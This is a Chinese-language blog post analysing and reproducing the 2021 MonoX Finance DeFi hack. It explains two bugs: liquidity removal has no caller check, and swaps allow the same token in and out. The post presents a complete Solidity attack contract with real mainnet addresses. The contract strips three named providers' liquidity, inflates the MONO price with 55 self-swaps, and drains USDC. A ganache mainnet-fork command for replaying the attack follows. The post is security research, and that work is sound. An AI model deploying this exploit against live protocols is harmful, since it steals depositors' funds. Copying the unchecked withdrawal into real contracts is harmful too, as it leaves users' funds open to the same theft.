【阿菜漏洞复现】DeFi 平台 MonoX Finance 漏洞分析及复现
2021 年 11 ⽉ 30 ⽇,DeFi 平台 MonoX Finance 遭遇攻击,损失共计约 3100 万美元。
- 移除流动性的函数未对调用者进行检测,使得任何用户都可以移除提供者的流动性。
- 代币交换函数未对传入的币对进行检测,可通过传入相同的币种抬高该币价格。
攻击者地址 2:0x8f6a86f3ab015f4d03ddb13abb02710e6d7ab31b
攻击合约 2:0x119914de3ae03256fd58b66cd6b8c6a12c70cfb2
攻击交易 2:
首先通过阅读官方文档对整个项目进行了解:MonoX docs
- Single Token Liquidity pools function by grouping the deposited token into a virtual pair with our
virtual USD stablecoin (vCASH)
, instead of having the liquidity provider deposit multiple pool pairs, they only have to deposit one. All the pools/pairs are in the same ERC1155 contract
. Monoswap- In exchange for providing liquidity, the LP receives their share of the liquidity reserve and the
ERC1155 LP token
. Liquidity providers receive a share of the fees proportional to their share of the liquidity reserve. - When one removes liquidity from the pool for Token A, the price of the token stays the same.
The pool burns the liquidity provider’s ERC 1155 LP token
. In exchange, the pool transfers to the user their share of Token A’s virtual pair’s net value. When the vCASH balance ispositive
, the user will get their share of vCASH plus their share of Token A. When the vCASH balance isnegative
, the user will receive their share of Token A, minus their share of vCASH debt valued in Token A. - LPs providing liquidity in selected/promo pools will get non-transferrable
- Monoswap address: 0xC36a7887786389405EA8DA0B87602Ae3902B88A1
- MonoXPool address: 0x59653E37F8c491C3Be36e5DD4D503Ca32B5ab2f4
- MONO address: 0x2920f7d6134f4669343e70122cA9b8f19Ef8fa5D
- vCASH address: 0x532D7ebE4556216490c9d03460214b58e4933454
攻击的目的是极大地提高 MONO 的价格,然后用 MONO 通过 MonoSwap 换取其他代币
攻击合约向 WETH 存 0.1 个 ETH,并授权给 Monoswap 的代理合约
用 0.1 WETH 从 Monoswap 中换出 79.986094311542621010 MONO
调用 Monoswap 的 pools 函数,查询 MONO-vCash 的相关信息
pid=10, lastPoolValue=531057465205747239605262, token=MONO, status=2, vcashDebt=0, vcashCredit=417969352001142975260, tokenBalance=101764473116983332370454, price=5218495054176274115, createdAt=1637853228
调用 MonoXPool 的 totalSupplyOf 函数, 查询 MONO-vCash 池子中作为 LP 证明的 MONO 的总量。
调用 MonoXPool 的 balanceOf 函数,查询提供大量流动性的用户(要移除流动性的目标)在 MONO-vCash 池子中作为 LP 证明的 MONO 数量。提供流动性的用户可以在其 token 页面找到(只有三位用户提供了流动性)。
移除提供大量流动性的用户的流动性,使得池中的 vCash 为 0 ,MONO 为 0 。
pid=10, lastPoolValue=1027394637, token=MONO, status=2, vcashDebt=0, vcashCredit=0, tokenBalance=0, price=5218495054176274115, createdAt=1637853228
往 MONO-vCash 池中添加流动性 196875656 MONO 。获得 927 liquidity .
pid=10, lastPoolValue=1027394637, token=MONO, status=2, vcashDebt=0, vcashCredit=0, tokenBalance=196875656, price=5218495054176274115, createdAt=1637853228
调用 55 次 Monoswap.swapExactTokenForToken 函数, 其中 tokenIn=MONO, tokenOut=MONO 。此举的目的是为了提高 MONO 的价格,使得 amountOut > amountIn 。此时的 MONO 价格已经大幅度上升到了 843741636512366463585990541128 。
pid=10, lastPoolValue=1027394637, token=MONO, status=2, vcashDebt=0, vcashCredit=0, tokenBalance=28065601457649448980, price=843741636512366463585990541128, createdAt=1637853228
然后通过调用 swapTokenForExactToken 函数,以高价的 MONO 换空池中的其他代币,达到获利的目的。
removeLiquidity 函数未对调用者进行检测,使得任何用户都可以移除提供者的流动性。
整体的代码流程如图。通过传入相同的代币(tokenIn=MONO, tokenOut=MONO),大幅拉升该代币的价格。
swapExactTokenForToken 函数
跟入 swapIn 函数
pragma solidity ^0.7.6;
interface WETH9{
function deposit() external payable;
function approve(address guy, uint wad) external;
interface Monoswap{
function swapExactTokenForToken(
address tokenIn,
address tokenOut,
uint amountIn,
uint amountOutMin,
address to,
uint deadline
) external;
function removeLiquidity (address _token, uint256 liquidity, address to,
uint256 minVcashOut,
uint256 minTokenOut) external;
function addLiquidity (address _token, uint256 _amount, address to) external;
enum PoolStatus {
function pools(address) external view
returns (
uint256 pid,
uint256 lastPoolValue,
address token,
PoolStatus status,
uint112 vcashDebt,
uint112 vcashCredit,
uint112 tokenBalance,
uint256 price,
uint256 createdAt
function swapTokenForExactToken(
address tokenIn,
address tokenOut,
uint amountInMax,
uint amountOut,
address to,
uint deadline
) external;
interface MonoXPool{
function balanceOf(address account, uint256 id) external returns (uint256);
interface MonoToken{
function approve(address spender, uint256 amount) external;
function balanceOf(address account) external returns(uint256);
contract attack{
address WETH9_address = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
address vCash_address = 0x532D7ebE4556216490c9d03460214b58e4933454;
address MONO_address = 0x2920f7d6134f4669343e70122cA9b8f19Ef8fa5D;
address USDC_address = 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48;
address MonoXPool_address = 0x59653E37F8c491C3Be36e5DD4D503Ca32B5ab2f4;
address Monoswap_address = 0xC36a7887786389405EA8DA0B87602Ae3902B88A1;
// the only 3 MONO liquidity providers
address LiquidityProvider1 = 0x7B9aa6ED8B514C86bA819B99897b69b608293fFC;
address LiquidityProvider2 = 0x81D98c8fdA0410ee3e9D7586cB949cD19FA4cf38;
address LiquidityProvider3 = 0xab5167e8cC36A3a91Fd2d75C6147140cd1837355;
// Please deplay with 0.1 eth.
function S1_Get_and_Approve_WETH() public{
WETH9(WETH9_address).deposit{value:0.1 ether, gas:40000}();
WETH9(WETH9_address).approve(Monoswap_address,0.1 ether);
// Swap the token form WETH to MONO in Monoswap.
function S2_Swap_form_WETH_to_MONO() public{
Monoswap(Monoswap_address).swapExactTokenForToken(WETH9_address, MONO_address, 0.1 ether, 1, address(this), block.timestamp);
// Remove the liqiudity of MONO pool.
function S3_Remove_Liquidity() public{
// Get the MONO banlance of provider, then remove it.
uint256 balanceOfProvider1 = MonoXPool(MonoXPool_address).balanceOf(LiquidityProvider1, 10);
Monoswap(Monoswap_address).removeLiquidity(MONO_address, balanceOfProvider1, LiquidityProvider1, 0, 0);
uint256 balanceOfProvider2 = MonoXPool(MonoXPool_address).balanceOf(LiquidityProvider2, 10);
Monoswap(Monoswap_address).removeLiquidity(MONO_address, balanceOfProvider2, LiquidityProvider2, 0, 0);
uint256 balanceOfProvider3 = MonoXPool(MonoXPool_address).balanceOf(LiquidityProvider3, 10);
Monoswap(Monoswap_address).removeLiquidity(MONO_address, balanceOfProvider3, LiquidityProvider3, 0, 0);
// After this step, the MONO and vCash banlances of pool is 0.
// But the price of MONO has not changed.
// Approve and add liqiudity to the MONO pool.
function S4_Add_Liqiudity_of_MONO() public{
MonoToken(MONO_address).approve(Monoswap_address, type(uint256).max);
// The attacker add 196875656 MONO.
Monoswap(Monoswap_address).addLiquidity(MONO_address, 196875656, address(this));
// To raise the price of MONO by swap MONO to MONO 55 times.
function S5_Raise_MONO_Price() public{
uint112 MONO_InPool;
for(uint256 i = 0; i < 55; i++){
// Get amount of MONO in pool.
(,,,,,,MONO_InPool,,) = Monoswap(Monoswap_address).pools(MONO_address);
// Swap MONO to MONO.
Monoswap(Monoswap_address).swapExactTokenForToken(MONO_address, MONO_address, MONO_InPool-1, 0, address(this), block.timestamp);
// Swaping the USDC by high price MONO.
function S6_Swap_MONO_to_USDC() public{
// Get the MONO balance of this contract.
uint256 MONO_InThis;
MONO_InThis = MonoToken(MONO_address).balanceOf(address(this));
// Get the USDC banlance of pool.
// uint256 USDC_InPool;
//(,,,,,,USDC_InPool,,) = Monoswap(Monoswap_address).pools(USDC_address);
// Using MONO to swap 4000000000000 USDC, while 4000000000000 < USDC_InPool.
Monoswap(Monoswap_address).swapTokenForExactToken(Monoswap_address, USDC_address, MONO_InThis, 4000000000000, msg.sender, block.timestamp);
// Because MonoXPool is ERC1155 contract, this function is necessary.
function onERC1155Received(address _operator, address _from, uint256 _id, uint256 _value, bytes calldata _data) external returns(bytes4){
bytes4 a = bytes4(keccak256("onERC1155Received(address,address,uint256,uint256,bytes)"));
// a = 0xf23a6e61
return a;
receive() payable external{}
要设置 -l
gas limit,否则会不够用。
ganache-cli --fork https://eth-mainnet.alchemyapi.io/v2/{your key}@13715025 -l 4294967295
部署合约,并往合约转入 0.1 eth
- 【github】W2Ning/MonoX_Vul_
- 【慢雾】DeFi 平台 MonoX Finance 被黑分析
- 【MonoX】MonoX docs
- 【ethtx】0x9f14d093a2349de08f02fc0fb018dadb449351d0cdb7d0738ff69cc6fef5f299
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